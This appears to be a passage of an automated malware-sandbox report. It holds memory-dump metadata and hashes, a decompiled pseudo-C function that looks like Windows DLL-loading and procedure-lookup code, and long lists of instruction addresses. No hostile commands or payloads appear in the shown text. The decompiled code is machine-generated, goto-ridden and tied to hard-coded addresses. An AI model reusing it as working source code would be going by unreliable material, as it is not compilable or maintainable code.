                                                                                            0x04d02186
                                                                                            0x04d459ae
                                                                                            0x04d459b2
                                                                                            0x04d459b5
                                                                                            0x04d459b7
                                                                                            0x04d459ba
                                                                                            0x04d459cd
                                                                                            0x04d459d1
                                                                                            0x04d459d5
                                                                                            0x04d459d9
                                                                                            0x04d459db
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d459dd
                                                                                            0x04d459dd
                                                                                            0x04d459e1
                                                                                            0x04d459e4
                                                                                            0x04d459e7
                                                                                            0x04d459ee
                                                                                            0x04d459ee
                                                                                            0x04d459f3
                                                                                            0x04d459f3
                                                                                            0x00000000
                                                                                            0x04d02186
                                                                                            0x04d02164
                                                                                            0x04d0216d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04d0216d
                                                                                            0x04d02106
                                                                                            0x04d02266
                                                                                            0x04d020d8
                                                                                            0x04d020da
                                                                                            0x04d020e0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.481988311.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.482563022.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                                            • Associated: 0000000A.00000002.482592275.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a6ee76e03dc0e81336401ce4d2c3c9179ad8b9739c7a62119ad704b4a65f86cc
                                                                                            • Instruction ID: 803951a09c2d8ed5567fad1e8c8b9307206269c165f8aefac93352fdf55b8e72
                                                                                            • Opcode Fuzzy Hash: a6ee76e03dc0e81336401ce4d2c3c9179ad8b9739c7a62119ad704b4a65f86cc
                                                                                            • Instruction Fuzzy Hash: CEF1BE3160A342AFEB25CF68C85476A77E1BBC5324F04C99DE9959B280E735FC41CB92
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 04CED5E0, Relevance: .4, Instructions: 353COMMONCrypto
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 87%
                                                                                            			E04CED5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4dcd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04CE6600(0x4dc52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4dc7b9c; // 0x0
							_t281 = L04CF4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04D1F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4dc7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x4dc7b8c; // 0xd029d0
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0xd02a80
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E04CF2280(_t200, 0x4dc84d8);
									_t277 =  *0x4dc85f4; // 0xd03218
									_t351 =  *0x4dc85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x75110000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0xd03260
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0xd031b0
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0xd03260
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0xd07b78
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04CEFFB0(_t287, _t353, 0x4dc84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04D2CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04CE6600(0x4dc52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04CE7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4dcb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04D5E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4dc8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4dcb218; // 0x0
														asm("ror edi, cl");
														 *0x4dcb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04CF2280(_t250, 0x4dc84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04D13898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04CEFFB0(_t293, _t353, 0x4dc84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04D137F5(_t353, 0);
																}
																E04D10413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04D09B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E04D002D6(_t174);
																}
																L04CF77F0( *0x4dc7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04D0C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04CEEC7F(_t353);
										L04D019B8(_t287, 0, _t353, 0);
										_t200 = E04CDF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04CF77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04D1B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4dcb2f8; // 0x1360000
									if((_t206 |  *0x4dcb2fc) == 0 || ( *0x4dcb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4dcb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04D86B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04D86AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04CEE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04CEEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04D19730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04CEE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04CE8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04D13C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                                                                            0x04ced5f2
                                                                                            0x04ced5f5
                                                                                            0x04ced5f5
                                                                                            0x04ced5fd
                                                                                            0x04ced600
                                                                                            0x04ced60a
                                                                                            0x04ced60d
                                                                                            0x04ced617
                                                                                            0x04ced61d
                                                                                            0x04ced627
                                                                                            0x04ced62e
                                                                                            0x04ced911
                                                                                            0x04ced913
                                                                                            0x00000000
                                                                                            0x04ced919
                                                                                            0x04ced919
                                                                                            0x04ced919
                                                                                            0x04ced634
                                                                                            0x04ced634
                                                                                            0x04ced634
                                                                                            0x04ced634
                                                                                            0x04ced640
                                                                                            0x04ced8bf
                                                                                            0x00000000
                                                                                            0x04ced646
                                                                                            0x04ced646
                                                                                            0x04ced64d
                                                                                            0x04ced652
                                                                                            0x04d3b2fc
                                                                                            0x04d3b2fc
                                                                                            0x04d3b302
                                                                                            0x04d3b33b
                                                                                            0x04d3b341
                                                                                            0x00000000
                                                                                            0x04d3b304
                                                                                            0x04d3b304
                                                                                            0x04d3b319
                                                                                            0x04d3b31e
                                                                                            0x04d3b324
                                                                                            0x04d3b326
                                                                                            0x04d3b332
                                                                                            0x04d3b347
                                                                                            0x04d3b34c
                                                                                            0x04d3b351
                                                                                            0x04d3b35a
                                                                                            0x00000000
                                                                                            0x04d3b328
                                                                                            0x04d3b328
                                                                                            0x00000000
                                                                                            0x04d3b328
                                                                                            0x04d3b326
                                                                                            0x04ced658
                                                                                            0x04ced658
                                                                                            0x04ced65b
                                                                                            0x04ced665
                                                                                            0x00000000
                                                                                            0x04ced66b
                                                                                            0x04ced66b
                                                                                            0x04ced66b
                                                                                            0x04ced66b
                                                                                            0x04ced66d
                                                                                            0x04ced672
                                                                                            0x04ced67a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ced680
                                                                                            0x04ced686
                                                                                            0x04ced8ce
                                                                                            0x04ced8d4
                                                                                            0x04ced8da
                                                                                            0x04ced8dd
                                                                                            0x04ced8dd
                                                                                            0x04ced8e0
                                                                                            0x04ced68c
                                                                                            0x04ced691
                                                                                            0x04ced69d
                                                                                            0x04ced6a2
                                                                                            0x04ced6a7
                                                                                            0x04ced6b0
                                                                                            0x04ced6b0
                                                                                            0x04ced6b5
                                                                                            0x04ced6e0
                                                                                            0x04ced6b7
                                                                                            0x04ced6b7
                                                                                            0x04ced6b9
                                                                                            0x04ced6b9
                                                                                            0x04ced6bb
                                                                                            0x04ced6bd
                                                                                            0x04ced6ce
                                                                                            0x04ced6d0
                                                                                            0x04ced6d2
                                                                                            0x04d3b363
                                                                                            0x04d3b365
                                                                                            0x00000000
                                                                                            0x04d3b36b
                                                                                            0x00000000
                                                                                            0x04d3b36b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ced6bf
                                                                                            0x04ced6bf
                                                                                            0x04ced6e5
                                                                                            0x04ced6e7
                                                                                            0x04ced6e9
                                                                                            0x04ced6e9
                                                                                            0x04ced6ec
                                                                                            0x04ced6ec
                                                                                            0x04ced6ef
                                                                                            0x04ced6f5
                                                                                            0x04ced6f9
                                                                                            0x04ced6fb
                                                                                            0x04ced6fd
                                                                                            0x04ced701
                                                                                            0x04ced703
                                                                                            0x04ced70a
                                                                                            0x04ced70a
                                                                                            0x04ced70a
                                                                                            0x04ced701
                                                                                            0x04ced70d
                                                                                            0x04ced710
                                                                                            0x04ced710
                                                                                            0x04ced6c1
                                                                                            0x04ced6c1
                                                                                            0x04ced6c1
                                                                                            0x04ced6c6
                                                                                            0x04d3b36d
                                                                                            0x04d3b36f
                                                                                            0x00000000
                                                                                            0x04d3b375
                                                                                            0x04d3b375
                                                                                            0x04d3b375
                                                                                            0x00000000
                                                                                            0x04d3b375
                                                                                            0x00000000
                                                                                            0x04ced6cc
                                                                                            0x04ced6d8
                                                                                            0x04ced6d8
                                                                                            0x04ced6d8
                                                                                            0x00000000
                                                                                            0x04ced6c6
                                                                                            0x04ced6bf
                                                                                            0x00000000
                                                                                            0x04ced6da
                                                                                            0x04ced6da
                                                                                            0x04ced716
                                                                                            0x04ced71b
                                                                                            0x04ced720
                                                                                            0x04ced726
                                                                                            0x04ced726
                                                                                            0x04ced72d
                                                                                            0x00000000
                                                                                            0x04ced733
                                                                                            0x04ced739
                                                                                            0x04ced742
                                                                                            0x04ced750
                                                                                            0x04ced758
                                                                                            0x04ced764
                                                                                            0x04ced776
                                                                                            0x04ced77a
                                                                                            0x04ced783
                                                                                            0x04ced928
                                                                                            0x04ced92c
                                                                                            0x04ced93d
                                                                                            0x04ced944
                                                                                            0x04ced94f
                                                                                            0x04ced954
                                                                                            0x04ced956
                                                                                            0x04ced95f
                                                                                            0x04ced961
                                                                                            0x04ced973
                                                                                            0x04ced973
                                                                                            0x04ced956
                                                                                            0x04ced944
                                                                                            0x04ced92c
                                                                                            0x04ced78b
                                                                                            0x04d3b394
                                                                                            0x04ced791
                                                                                            0x04ced798
                                                                                            0x04d3b3a3
                                                                                            0x04d3b3bb
                                                                                            0x04d3b3bb
                                                                                            0x04ced7a5
                                                                                            0x04ced866
                                                                                            0x04ced870
                                                                                            0x04ced884
                                                                                            0x04ced892
                                                                                            0x04ced898
                                                                                            0x04ced89e
                                                                                            0x04ced8a0
                                                                                            0x04ced8a6
                                                                                            0x04ced8ac
                                                                                            0x04ced8ae
                                                                                            0x04ced8b4
                                                                                            0x04ced8b4
                                                                                            0x04ced8ae
                                                                                            0x04ced7a5
                                                                                            0x04ced78b
                                                                                            0x04ced7b1
                                                                                            0x04d3b3c5
                                                                                            0x04d3b3c5
                                                                                            0x04ced7c3
                                                                                            0x04ced7ca
                                                                                            0x04ced7e5
                                                                                            0x04ced7eb
                                                                                            0x04ced8eb
                                                                                            0x04ced8ed
                                                                                            0x00000000
                                                                                            0x04ced8f3
                                                                                            0x04ced8f3
                                                                                            0x04ced8f3
                                                                                            0x00000000
                                                                                            0x04ced8ed
                                                                                            0x04ced7cc
                                                                                            0x04ced7cc
                                                                                            0x04ced7d2
                                                                                            0x00000000
                                                                                            0x04ced7d4
                                                                                            0x04ced7d4
                                                                                            0x04ced7d7
                                                                                            0x04ced7df
                                                                                            0x04d3b3d4
                                                                                            0x04d3b3d9
                                                                                            0x04d3b3dc
                                                                                            0x04d3b3dc
                                                                                            0x04d3b3df
                                                                                            0x04d3b3e2
                                                                                            0x04d3b468
                                                                                            0x04d3b46d
                                                                                            0x04d3b46f
                                                                                            0x04d3b46f
                                                                                            0x04d3b475
                                                                                            0x04ced8f8
                                                                                            0x04ced8f9
                                                                                            0x04ced8fd
                                                                                            0x04d3b3e8
                                                                                            0x04d3b3e8
                                                                                            0x04d3b3eb
                                                                                            0x04d3b3ed
                                                                                            0x00000000
                                                                                            0x04d3b3ef
                                                                                            0x04d3b3ef
                                                                                            0x04d3b3f1
                                                                                            0x04d3b3f4
                                                                                            0x04d3b3fe
                                                                                            0x04d3b404
                                                                                            0x04d3b409
                                                                                            0x04d3b40e
                                                                                            0x04d3b410
                                                                                            0x04d3b410
                                                                                            0x04d3b414
                                                                                            0x04d3b414
                                                                                            0x04d3b41b
                                                                                            0x04d3b420
                                                                                            0x04d3b423
                                                                                            0x04d3b425
                                                                                            0x04d3b427
                                                                                            0x04d3b42a
                                                                                            0x04d3b42d
                                                                                            0x04d3b42d
                                                                                            0x04d3b42a
                                                                                            0x04d3b432
                                                                                            0x04d3b436
                                                                                            0x04d3b438
                                                                                            0x04d3b43b
                                                                                            0x04d3b43b
                                                                                            0x04d3b449
                                                                                            0x04d3b44e
                                                                                            0x04d3b454
                                                                                            0x04d3b458
                                                                                            0x04d3b458
                                                                                            0x04d3b45d
                                                                                            0x00000000
                                                                                            0x04d3b45d
                                                                                            0x04d3b3ed
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04ced7df
                                                                                            0x04ced7d2
                                                                                            0x04ced7ca
                                                                                            0x04d3b37c
                                                                                            0x04d3b37e
                                                                                            0x04d3b385
                                                                                            0x04d3b38a
                                                                                            0x00000000
                                                                                            0x04d3b38a
                                                                                            0x04ced742
                                                                                            0x04ced7f1
                                                                                            0x04ced7f8
                                                                                            0x04d3b49b
                                                                                            0x04d3b49b
                                                                                            0x04ced800
                                                                                            0x04ced837
                                                                                            0x04ced843
                                                                                            0x04ced845
                                                                                            0x04ced847
                                                                                            0x04ced84a
                                                                                            0x04ced84b
                                                                                            0x04ced84e
                                                                                            0x04ced857
                                                                                            0x04ced802
                                                                                            0x04ced802
                                                                                            0x04ced80d
                                                                                            0x00000000
                                                                                            0x04ced818
                                                                                            0x04ced818
                                                                                            0x04ced824
                                                                                            0x04ced831
                                                                                            0x04d3b4a5
                                                                                            0x04d3b4ab
                                                                                            0x04d3b4b3
                                                                                            0x04d3b4b8
                                                                                            0x04d3b4bb
                                                                                            0x00000000
                                                                                            0x04d3b4c1
                                                                                            0x04d3b4c1
                                                                                            0x04d3b4c8
                                                                                            0x00000000
                                                                                            0x04d3b4ce
                                                                                            0x04d3b4d4
                                                                                            0x04d3b4e1
                                                                                            0x04d3b4e3
                                                                                            0x04d3b4e5
                                                                                            0x00000000
                                                                                            0x04d3b4eb
                                                                                            0x04d3b4f0
                                                                                            0x04d3b4f2
                                                                                            0x04cedac9
                                                                                            0x04cedacc
                                                                                            0x04cedacf
                                                                                            0x04cedad1
                                                                                            0x04cedd78
                                                                                            0x04cedd78
                                                                                            0x04cedcf2
                                                                                            0x00000000
                                                                                            0x04cedad7
                                                                                            0x04cedad9
                                                                                            0x04cedadb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04cedae1
                                                                                            0x04cedae1
                                                                                            0x04cedae4
                                                                                            0x04cedae6
                                                                                            0x04d3b4f9
                                                                                            0x04d3b4f9
                                                                                            0x04d3b500
                                                                                            0x04cedaec
                                                                                            0x04cedaec
                                                                                            0x04cedaf5
                                                                                            0x04cedaf8
                                                                                            0x04cedafb
                                                                                            0x04cedb03
                                                                                            0x04cedb11
                                                                                            0x04cedb16
                                                                                            0x04cedb19
                                                                                            0x04cedb1b
                                                                                            0x04d3b52c
                                                                                            0x04d3b531
                                                                                            0x04d3b534
                                                                                            0x04cedb21
                                                                                            0x04cedb21
                                                                                            0x04cedb24
                                                                                            0x04cedcd9
                                                                                            0x04cedce2
                                                                                            0x04cedce5
                                                                                            0x04cedd6a
                                                                                            0x04cedd6d
                                                                                            0x00000000
                                                                                            0x04cedd73
                                                                                            0x04d3b51a
                                                                                            0x04d3b51c
                                                                                            0x04d3b51f
                                                                                            0x04d3b524
                                                                                            0x00000000
